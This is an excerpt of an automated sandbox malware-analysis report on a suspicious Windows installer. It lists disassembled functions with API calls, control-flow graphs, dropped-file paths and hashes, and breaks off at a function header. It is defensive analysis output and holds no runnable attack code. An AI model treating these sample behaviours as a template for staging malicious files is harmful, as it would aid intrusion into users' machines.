                                                                • GetModuleHandleW.KERNEL32(00000008), ref: 6EDF2201
                                                                • LoadLibraryW.KERNEL32(00000008), ref: 6EDF2212
                                                                • GetProcAddress.KERNEL32(?,?), ref: 6EDF226C
                                                                • lstrlenW.KERNEL32(00000808), ref: 6EDF2286
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1649696285.000000006EDF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 6EDF0000, based on PE: true
                                                                • Associated: 00000000.00000002.1649673053.000000006EDF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000000.00000002.1649710611.000000006EDF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000000.00000002.1649724182.000000006EDF6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6edf0000_No.jbxd
                                                                Similarity
                                                                • API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
                                                                • String ID:
                                                                • API String ID: 245916457-0
                                                                • Opcode ID: 9ac3204dddd798162eb0114957892a7c9d58cc2d00890c1eeb5c3fba0e1a1e69
                                                                • Instruction ID: 7d07cf00083cf7f66c44ca6fc10730e80963dc9883f18a931ff3b636f4e4d32d
                                                                • Opcode Fuzzy Hash: 9ac3204dddd798162eb0114957892a7c9d58cc2d00890c1eeb5c3fba0e1a1e69
                                                                • Instruction Fuzzy Hash: F522BCB1C1424ADEDB50CFE9C9902EEB7B4FF05319F12462ED1A5E7281D7709A8B8B50
                                                                Function 00405B23 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 148filestringCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 730 405b23-405b49 call 405dee 733 405b62-405b69 730->733 734 405b4b-405b5d DeleteFileW 730->734 736 405b6b-405b6d 733->736 737 405b7c-405b8c call 406411 733->737 735 405cdf-405ce3 734->735 738 405b73-405b76 736->738 739 405c8d-405c92 736->739 743 405b9b-405b9c call 405d32 737->743 744 405b8e-405b99 lstrcatW 737->744 738->737 738->739 739->735 742 405c94-405c97 739->742 745 405ca1-405ca9 call 40676f 742->745 746 405c99-405c9f 742->746 748 405ba1-405ba5 743->748 744->748 745->735 754 405cab-405cbf call 405ce6 call 405adb 745->754 746->735 751 405bb1-405bb7 lstrcatW 748->751 752 405ba7-405baf 748->752 753 405bbc-405bd8 lstrlenW FindFirstFileW 751->753 752->751 752->753 755 405c82-405c86 753->755 756 405bde-405be6 753->756 770 405cc1-405cc4 754->770 771 405cd7-405cda call 405479 754->771 755->739 761 405c88 755->761 758 405c06-405c1a call 406411 756->758 759 405be8-405bf0 756->759 772 405c31-405c3c call 405adb 758->772 773 405c1c-405c24 758->773 762 405bf2-405bfa 759->762 763 405c65-405c75 FindNextFileW 759->763 761->739 762->758 766 405bfc-405c04 762->766 763->756 769 405c7b-405c7c FindClose 763->769 766->758 766->763 769->755 770->746 774 405cc6-405cd5 call 405479 call 4061d7 770->774 771->735 781 405c5d-405c60 call 405479 772->781 782 405c3e-405c41 772->782 773->763 775 405c26-405c2f call 405b23 773->775 774->735 775->763 781->763 785 405c43-405c53 call 405479 call 4061d7 782->785 786 405c55-405c5b 782->786 785->763 786->763
                                                                APIs
                                                                • DeleteFileW.KERNELBASE(?,?,771B3420,C:\Users\user~1\AppData\Local\Temp\,00000000), ref: 00405B4C
                                                                • lstrcatW.KERNEL32(bismers\Phytotomist54.off,\*.*,bismers\Phytotomist54.off,?,?,771B3420,C:\Users\user~1\AppData\Local\Temp\,00000000), ref: 00405B94
                                                                • lstrcatW.KERNEL32(?,0040A014,?,bismers\Phytotomist54.off,?,?,771B3420,C:\Users\user~1\AppData\Local\Temp\,00000000), ref: 00405BB7
                                                                • lstrlenW.KERNEL32(?,?,0040A014,?,bismers\Phytotomist54.off,?,?,771B3420,C:\Users\user~1\AppData\Local\Temp\,00000000), ref: 00405BBD
                                                                • FindFirstFileW.KERNELBASE(bismers\Phytotomist54.off,?,?,?,0040A014,?,bismers\Phytotomist54.off,?,?,771B3420,C:\Users\user~1\AppData\Local\Temp\,00000000), ref: 00405BCD
                                                                • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405C6D
                                                                • FindClose.KERNEL32(00000000), ref: 00405C7C
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1606783703.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.1606769972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606798240.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000047D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606920867.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_No.jbxd
                                                                Similarity
                                                                • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                • String ID: "C:\Users\user\Desktop\No. 1349240400713.exe"$C:\Users\user~1\AppData\Local\Temp\$\*.*$bismers\Phytotomist54.off
                                                                • API String ID: 2035342205-1594420255
                                                                • Opcode ID: d511c024af8fdc6ff868d432ce58507b2a66eda6578bf5e7436de137c1c2de65
                                                                • Instruction ID: 64ad53015563eb9bad7c636b6f780160dd5a6986b89d0419f795064a900c36f2
                                                                • Opcode Fuzzy Hash: d511c024af8fdc6ff868d432ce58507b2a66eda6578bf5e7436de137c1c2de65
                                                                • Instruction Fuzzy Hash: 8941B330804B18AAEB21AB658D89AAF7778EF41714F24417FF802B11D1D77C5E81DE6E
                                                                Function 0040676F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • FindFirstFileW.KERNELBASE(771B3420,004302B8,bismers\Phytotomist54.off,00405E37,bismers\Phytotomist54.off,bismers\Phytotomist54.off,00000000,bismers\Phytotomist54.off,bismers\Phytotomist54.off,771B3420,?,C:\Users\user~1\AppData\Local\Temp\,00405B43,?,771B3420,C:\Users\user~1\AppData\Local\Temp\), ref: 0040677A
                                                                • FindClose.KERNEL32(00000000), ref: 00406786
                                                                Strings
                                                                • bismers\Phytotomist54.off, xrefs: 0040676F
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1606783703.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.1606769972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606798240.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000047D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606920867.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_No.jbxd
                                                                Similarity
                                                                • API ID: Find$CloseFileFirst
                                                                • String ID: bismers\Phytotomist54.off
                                                                • API String ID: 2295610775-3037600859
                                                                • Opcode ID: 86d0f84efe5cb21a5e65899ed37e92679b9de560e532c409a12d624e9ae3e839
                                                                • Instruction ID: c6bcef3f8635fd9f58624a192a3d19c105278d067f6c5fe4f3eb3d2c281a06a9
                                                                • Opcode Fuzzy Hash: 86d0f84efe5cb21a5e65899ed37e92679b9de560e532c409a12d624e9ae3e839
                                                                • Instruction Fuzzy Hash: F0D012315242206FC3805B386E0C84B7A989F16335B218B36B4AAF21E0D7349C3287BC
                                                                Function 004021A2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 129comCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • CoCreateInstance.OLE32(004085F0,?,00000001,004085E0,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402221
                                                                Strings
                                                                • C:\Users\user\udstrmningsdysernes\eir\Speckly, xrefs: 00402261
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1606783703.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.1606769972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606798240.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000047D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606920867.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_No.jbxd
                                                                Similarity
                                                                • API ID: CreateInstance
                                                                • String ID: C:\Users\user\udstrmningsdysernes\eir\Speckly
                                                                • API String ID: 542301482-849927899
                                                                • Opcode ID: 9d479c7c72b9213c6dfc702f82f35e79a053754e3cc1bdd00607558639033416
                                                                • Instruction ID: 552a380bc1a798379165a166047c46cc7e7689cdd056a509842d4882e8d45c12
                                                                • Opcode Fuzzy Hash: 9d479c7c72b9213c6dfc702f82f35e79a053754e3cc1bdd00607558639033416
                                                                • Instruction Fuzzy Hash: 33410875A00208AFCF00DFE4C989A9E7BB6FF48314B20457AF515EB2D1DB799981CB54
                                                                Function 00402902 Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • FindFirstFileW.KERNELBASE(00000000,?,00000002), ref: 00402911
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1606783703.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.1606769972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606798240.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000047D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606920867.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_No.jbxd
                                                                Similarity
                                                                • API ID: FileFindFirst
                                                                • String ID:
                                                                • API String ID: 1974802433-0
                                                                • Opcode ID: f1f75f85ad8f91268d35bee39362f1624f539314e89723e4461874efd2ba877a
                                                                • Instruction ID: 56039e75b3af19f60320d449630e93dfdbb15a7187211f692f50db0849c99601
                                                                • Opcode Fuzzy Hash: f1f75f85ad8f91268d35bee39362f1624f539314e89723e4461874efd2ba877a
                                                                • Instruction Fuzzy Hash: C8F08C71A04114AEC700DFA4DD499AEB378EF10328F70457BE511F31E0D7B89E119B29
                                                                Function 00404DD4 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 490windowmemoryCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 139 404dd4-404e22 GetDlgItem * 2 140 405055-40505c 139->140 141 404e28-404ec3 GlobalAlloc LoadImageW SetWindowLongW ImageList_Create ImageList_AddMasked SendMessageW * 2 139->141 142 405070 140->142 143 40505e-40506e 140->143 144 404ed2-404edb DeleteObject 141->144 145 404ec5-404ed0 SendMessageW 141->145 146 405073-40507c 142->146 143->146 147 404edd-404ee5 144->147 145->144 148 405087-40508d 146->148 149 40507e-405081 146->149 150 404ee7-404eea 147->150 151 404f0e-404f12 147->151 155 40509c-4050a3 148->155 156 40508f-405096 148->156 149->148 152 40516b-405172 149->152 153 404eec 150->153 154 404eef-404f0c call 40644e SendMessageW * 2 150->154 151->147 157 404f14-404f44 call 404367 * 2 151->157 162 4051e3-4051ea 152->162 163 405174-40517a 152->163 153->154 154->151 159 4050a5-4050a8 155->159 160 40511b-40511e 155->160 156->152 156->155 198 405014-405027 GetWindowLongW SetWindowLongW 157->198 199 404f4a-404f50 157->199 168 4050b3-4050c9 call 404d22 159->168 169 4050aa-4050b1 159->169 160->152 164 405120-40512a 160->164 166 4051f8-4051ff 162->166 167 4051ec-4051f6 SendMessageW 162->167 171 405180-40518a 163->171 172 4053d8-4053ea call 4043ce 163->172 173 40513a-405144 164->173 174 40512c-405138 SendMessageW 164->174 176 405201-405208 166->176 177 405233-40523a 166->177 167->166 168->160 197 4050cb-4050d9 168->197 169->160 169->168 171->172 180 405190-40519f SendMessageW 171->180 173->152 181 405146-40514d 173->181 174->173 183 405211-405218 176->183 184 40520a-40520b ImageList_Destroy 176->184 187 405240-40524c call 4011ef 177->187 188 40539a-4053a1 177->188 180->172 189 4051a5-4051b6 SendMessageW 180->189 193 40515e-405168 181->193 194 40514f-40515c 181->194 195 405221-40522d 183->195 196 40521a-40521b GlobalFree 183->196 184->183 207 40525c-40525f 187->207 208 40524e-405251 187->208 188->172 192 4053a3-4053aa 188->192 190 4051c0-4051c2 189->190 191 4051b8-4051be 189->191 202 4051c3-4051dc call 401299 SendMessageW 190->202 191->190 191->202 192->172 203 4053ac-4053d6 ShowWindow GetDlgItem ShowWindow 192->203 193->152 194->152 195->177 196->195 197->160 205 4050db-4050dd 197->205 204 40502d-405030 198->204 206 404f53-404f59 199->206 202->162 203->172 210 405032-405045 ShowWindow call 40439c 204->210 211 40504a-405052 call 40439c 204->211 212 4050f0 205->212 213 4050df-4050e6 205->213 214 404ff6-405009 206->214 215 404f5f-404f8a 206->215 223 4052a0-4052c4 call 4011ef 207->223 224 405261-40527a call 4012e2 call 401299 207->224 219 405253 208->219 220 405254-405257 call 404da2 208->220 210->172 211->140 218 4050f3-405118 call 40117d 212->218 227 4050e8-4050ea 213->227 228 4050ec-4050ee 213->228 214->206 222 40500f-405012 214->222 216 404fc6-404fc8 215->216 217 404f8c-404fc4 SendMessageW 215->217 229 404fca-404fdc SendMessageW 216->229 230 404fde-404ff3 SendMessageW 216->230 217->214 218->160 219->220 220->207 222->198 222->204 241 405366-40536e 223->241 242 4052ca 223->242 247 40528a-405299 SendMessageW 224->247 248 40527c-405282 224->248 227->218 228->218 229->214 230->214 245 405370-405376 InvalidateRect 241->245 246 40537c-405384 241->246 243 4052cd-4052d8 242->243 249 4052da-4052e9 243->249 250 40534e-405360 243->250 245->246 246->188 251 405386-405395 call 404cf5 call 404cdd 246->251 247->223 255 405284 248->255 256 405285-405288 248->256 253 4052eb-4052f8 249->253 254 4052fc-4052ff 249->254 250->241 250->243 251->188 253->254 258 405301-405304 254->258 259 405306-40530f 254->259 255->256 256->247 256->248 261 405314-40534c SendMessageW * 2 258->261 259->261 262 405311 259->262 261->250 262->261
                                                                APIs
                                                                • GetDlgItem.USER32(?,000003F9), ref: 00404DEB
                                                                • GetDlgItem.USER32(?,00000408), ref: 00404DF8
                                                                • GlobalAlloc.KERNEL32(00000040,?), ref: 00404E44
                                                                • LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404E5B
                                                                • SetWindowLongW.USER32(?,000000FC,004053ED), ref: 00404E75
                                                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404E89
                                                                • ImageList_AddMasked.COMCTL32(00000000,00000110,00FF00FF), ref: 00404E9D
                                                                • SendMessageW.USER32(?,00001109,00000002), ref: 00404EB2
                                                                • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404EBE
                                                                • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404ED0
                                                                • DeleteObject.GDI32(00000110), ref: 00404ED5
                                                                • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404F00
                                                                • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404F0C
                                                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404FA7
                                                                • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00404FD7
                                                                  • Part of subcall function 0040439C: SendMessageW.USER32(00000028,?,00000001,004041C7), ref: 004043AA
                                                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404FEB
                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00405019
                                                                • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00405027
                                                                • ShowWindow.USER32(?,00000005), ref: 00405037
                                                                • SendMessageW.USER32(?,00000419,00000000,?), ref: 00405138
                                                                • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0040519A
                                                                • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 004051AF
                                                                • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 004051D3
                                                                • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 004051F6
                                                                • ImageList_Destroy.COMCTL32(?), ref: 0040520B
                                                                • GlobalFree.KERNEL32(?), ref: 0040521B
                                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405294
                                                                • SendMessageW.USER32(?,00001102,?,?), ref: 0040533D
                                                                • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040534C
                                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 00405376
                                                                • ShowWindow.USER32(?,00000000), ref: 004053C4
                                                                • GetDlgItem.USER32(?,000003FE), ref: 004053CF
                                                                • ShowWindow.USER32(00000000), ref: 004053D6
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1606783703.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.1606769972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606798240.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000047D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606920867.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_No.jbxd
                                                                Similarity
                                                                • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                • String ID: $M$N
                                                                • API String ID: 2564846305-813528018
                                                                • Opcode ID: 5598e06cb67788476fc8c7d334527adddce2bdc5635884aaeb3921699d952b74
                                                                • Instruction ID: d580a4fcaa5169941c29ca465f5867fc490570c71858173d192e260bc12e7e27
                                                                • Opcode Fuzzy Hash: 5598e06cb67788476fc8c7d334527adddce2bdc5635884aaeb3921699d952b74
                                                                • Instruction Fuzzy Hash: 9C127A70D00609EFDB20DFA5CD45AAEBBB5FB84314F10817AEA10BA2E1C7798941DF58
                                                                Function 00403E8E Relevance: 48.3, APIs: 32, Instructions: 346windowstringCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 263 403e8e-403ea0 264 403fe1-403ff0 263->264 265 403ea6-403eac 263->265 267 403ff2-40403a GetDlgItem * 2 call 404367 SetClassLongW call 40140b 264->267 268 40403f-404054 264->268 265->264 266 403eb2-403ebb 265->266 269 403ed0-403ed3 266->269 270 403ebd-403eca SetWindowPos 266->270 267->268 272 404094-404099 call 4043b3 268->272 273 404056-404059 268->273 275 403ed5-403ee7 ShowWindow 269->275 276 403eed-403ef3 269->276 270->269 281 40409e-4040b9 272->281 278 40405b-404066 call 401389 273->278 279 40408c-40408e 273->279 275->276 282 403ef5-403f0a DestroyWindow 276->282 283 403f0f-403f12 276->283 278->279 300 404068-404087 SendMessageW 278->300 279->272 280 404334 279->280 288 404336-40433d 280->288 286 4040c2-4040c8 281->286 287 4040bb-4040bd call 40140b 281->287 289 404311-404317 282->289 291 403f14-403f20 SetWindowLongW 283->291 292 403f25-403f2b 283->292 296 4042f2-40430b DestroyWindow EndDialog 286->296 297 4040ce-4040d9 286->297 287->286 289->280 295 404319-40431f 289->295 291->288 298 403f31-403f42 GetDlgItem 292->298 299 403fce-403fdc call 4043ce 292->299 295->280 302 404321-40432a ShowWindow 295->302 296->289 297->296 303 4040df-40412c call 40644e call 404367 * 3 GetDlgItem 297->303 304 403f61-403f64 298->304 305 403f44-403f5b SendMessageW IsWindowEnabled 298->305 299->288 300->288 302->280 333 404136-404172 ShowWindow KiUserCallbackDispatcher call 404389 EnableWindow 303->333 334 40412e-404133 303->334 308 403f66-403f67 304->308 309 403f69-403f6c 304->309 305->280 305->304 310 403f97-403f9c call 404340 308->310 311 403f7a-403f7f 309->311 312 403f6e-403f74 309->312 310->299 314 403fb5-403fc8 SendMessageW 311->314 316 403f81-403f87 311->316 312->314 315 403f76-403f78 312->315 314->299 315->310 319 403f89-403f8f call 40140b 316->319 320 403f9e-403fa7 call 40140b 316->320 329 403f95 319->329 320->299 330 403fa9-403fb3 320->330 329->310 330->329 337 404174-404175 333->337 338 404177 333->338 334->333 339 404179-4041a7 GetSystemMenu EnableMenuItem SendMessageW 337->339 338->339 340 4041a9-4041ba SendMessageW 339->340 341 4041bc 339->341 342 4041c2-404201 call 40439c call 403e6f call 406411 lstrlenW call 40644e SetWindowTextW call 401389 340->342 341->342 342->281 353 404207-404209 342->353 353->281 354 40420f-404213 353->354 355 404232-404246 DestroyWindow 354->355 356 404215-40421b 354->356 355->289 358 40424c-404279 CreateDialogParamW 355->358 356->280 357 404221-404227 356->357 357->281 359 40422d 357->359 358->289 360 40427f-4042d6 call 404367 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 358->360 359->280 360->280 365 4042d8-4042f0 ShowWindow call 4043b3 360->365 365->289
                                                                APIs
                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403ECA
                                                                • ShowWindow.USER32(?), ref: 00403EE7
                                                                • DestroyWindow.USER32 ref: 00403EFB
                                                                • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403F17
                                                                • GetDlgItem.USER32(?,?), ref: 00403F38
                                                                • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403F4C
                                                                • IsWindowEnabled.USER32(00000000), ref: 00403F53
                                                                • GetDlgItem.USER32(?,00000001), ref: 00404001
                                                                • GetDlgItem.USER32(?,00000002), ref: 0040400B
                                                                • SetClassLongW.USER32(?,000000F2,?), ref: 00404025
                                                                • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00404076
                                                                • GetDlgItem.USER32(?,00000003), ref: 0040411C
                                                                • ShowWindow.USER32(00000000,?), ref: 0040413D
                                                                • KiUserCallbackDispatcher.NTDLL(?,?), ref: 0040414F
                                                                • EnableWindow.USER32(?,?), ref: 0040416A
                                                                • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00404180
                                                                • EnableMenuItem.USER32(00000000), ref: 00404187
                                                                • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040419F
                                                                • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004041B2
                                                                • lstrlenW.KERNEL32(0042D268,?,0042D268,00000000), ref: 004041DC
                                                                • SetWindowTextW.USER32(?,0042D268), ref: 004041F0
                                                                • ShowWindow.USER32(?,0000000A), ref: 00404324
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1606783703.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.1606769972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606798240.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000047D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606920867.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_No.jbxd
                                                                Similarity
                                                                • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                • String ID:
                                                                • API String ID: 3282139019-0
                                                                • Opcode ID: 107ad6bdab59df7c6dc1e53992544a2f2aa45a341ad300a22c315677171673b9
                                                                • Instruction ID: cb6f0490afd218b95da4ce8f8645ed9f2a2dc6dad26b5163c80864a666f03042
                                                                • Opcode Fuzzy Hash: 107ad6bdab59df7c6dc1e53992544a2f2aa45a341ad300a22c315677171673b9
                                                                • Instruction Fuzzy Hash: 40C1AFB1600305EFDB206F61EE85E2B7A68FB85706B54053EFA81B11F0CB799841DB2D
                                                                Function 00403AE0 Relevance: 45.7, APIs: 13, Strings: 13, Instructions: 215stringregistryCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
